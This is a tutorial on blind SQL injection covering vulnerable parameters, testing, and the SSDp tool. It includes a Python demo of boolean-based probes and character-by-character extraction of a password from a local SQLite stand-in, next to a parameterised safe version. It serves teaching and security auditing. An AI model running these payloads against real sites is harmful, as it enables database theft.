What is Blind SQL Injection?
Blind SQL injection is identical to normal SQL injection except that, when an attacker attempts to exploit the application, they do not get a useful database error message back; instead they get a generic page specified by the developer. This makes exploiting a potential SQL injection flaw more difficult, but not impossible.
An attacker can still steal data by asking the database a series of true/false questions through injected SQL. The attacker supplies your application with crafted input, and the application uses that input to build a SQL statement by string concatenation.
This lets the attacker change the semantics of the SQL query. People use string concatenation because they do not know there is another, safer method (parameterised queries, where user input is bound as data rather than spliced into the statement), and, let's be honest, string concatenation is easy; but it is the wrong approach. A less common variant is a SQL stored procedure that takes a parameter and either executes the argument directly or concatenates it into a statement and executes the result.
Nowadays blind SQL injection is much easier to perform than it was a few years ago, because many SQL injection tools are available on the Internet. You can download them from security or hacker websites and use them to test MySQL, MSSQL or Oracle back ends. With these automated tools it is quick and easy to find SQL injection or blind SQL injection holes in a website.
Finding Vulnerable URL
Before you can perform blind SQL injection testing, you must find a vulnerable URL or path on the website where you can inject malicious code or characters into a vulnerable parameter. You need to find out why the website is vulnerable to blind SQL injection before you can attack that parameter. To find a vulnerable URL path.
Testing Vulnerable Parameter
From the results of the testing recorded in webscan.txt, we found some possible blind SQL injection bugs on the targeted server and now try to prove them. Let's say that you are auditing a web application server and have found a page that accepts dynamic user-provided values in GET or POST parameters, in HTTP cookie values or in the HTTP User-Agent header.
You now want to test for a SQL injection vulnerability and exploit it to retrieve as much information as possible from the web application's back-end database management system, or even to reach the underlying operating system. You must prove the vulnerability you have found by exploiting it until you obtain concrete findings. To test a vulnerable parameter, you can use a manual technique or an automated tool.
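The following is an added example, not code from the original page and not part of SSDp or any other tool it mentions. It shows both halves of what the text describes: the boolean-based probe pair used to test a single parameter (the page answers a "true" payload and a "false" payload differently only if the condition reached the database), and the true/false questioning that then recovers data one character at a time through nothing but the developer's generic page. The application, its pageid parameter, the pages and users tables and the admin password are all constructed assumptions; an in-memory SQLite database stands in for the real back end, and the vulnerable handler (string concatenation) is shown beside the parameterised one the text calls the safer method.

```python
import sqlite3


def build_db():
    """Constructed sample back-end: an in-memory SQLite database standing in for
    the target's DBMS. Table names, columns and the secret are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (pageid INTEGER, title TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


class BlindApp:
    """Hypothetical handler for ?pageid=... Whatever happens inside, the caller
    only learns 'page found' (True) or 'generic error page' (False); no SQL
    error text ever leaves the application, which is what makes it blind."""

    def __init__(self, conn, safe=False):
        self.conn = conn
        self.safe = safe
        self.requests = 0  # how many questions the attacker has asked so far

    def show_page(self, pageid):
        self.requests += 1
        try:
            if self.safe:
                # Hardened: the value is bound as data and can never become SQL.
                cur = self.conn.execute(
                    "SELECT title FROM pages WHERE pageid = ?", (pageid,))
            else:
                # Vulnerable: string concatenation lets the input rewrite the query.
                cur = self.conn.execute(
                    "SELECT title FROM pages WHERE pageid = " + str(pageid))
            return cur.fetchone() is not None
        except sqlite3.Error:
            return False  # the developer's generic page: nothing is leaked


def is_injectable(app, base_value):
    """Boolean-based probe for one parameter. The two payloads differ only in a
    condition that is true in one and false in the other; if the page answers
    them differently, the condition was evaluated by the database."""
    baseline = app.show_page(base_value)
    true_probe = f"{base_value} AND 1=1"
    false_probe = f"{base_value} AND 1=2"
    return baseline and app.show_page(true_probe) and not app.show_page(false_probe)


def extract(app, base_value, subquery, max_len=32):
    """Recover the result of `subquery` one character at a time using only
    true/false questions: 'is the code point of character N greater than X?'.
    A binary search over 0..255 costs exactly 8 questions per character."""
    result = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 255
        while low < high:
            mid = (low + high) // 2
            payload = f"{base_value} AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if app.show_page(payload):
                low = mid + 1   # character is larger than mid
            else:
                high = mid      # character is mid or smaller, or past the end
        if low == 0:
            break  # substr() past the end gives '', unicode('') is NULL: done
        result += chr(low)
    return result


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE name='admin'"
    vuln = BlindApp(build_db())
    print("vulnerable app injectable:", is_injectable(vuln, 1))
    print("admin password:", extract(vuln, 1, secret), "in", vuln.requests, "requests")
    safe = BlindApp(build_db(), safe=True)
    print("hardened app injectable:", is_injectable(safe, 1))
```

Against the hardened handler every injected payload is compared as a literal value, so both probes return the generic page and nothing can be extracted; against the vulnerable one a six-character secret falls in 56 requests, which is why this kind of extraction is routinely automated. Real DBMSs differ in function names (for example ASCII() and SUBSTRING() on MySQL or MSSQL), so the payload template is the part you would adapt per target.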
Using Simple SQLi Dumper for Blind SQL Injection
Simple SQLi Dumper (SSDp) is an open source SQL injection tool for PHP/MySQL web applications, written in Perl. It is used to find and exploit injection bugs in applications backed by a MySQL database. You must understand how the SSDp tool works before relying on it.
If you do not know how to use it, refer to the built-in Help menu (run ssdp.pl -h to display it). From the target URL tested in Chapter 3 above, I found that the parameter pageid is vulnerable to injection, so I used this vulnerable page to test the SSDp tool.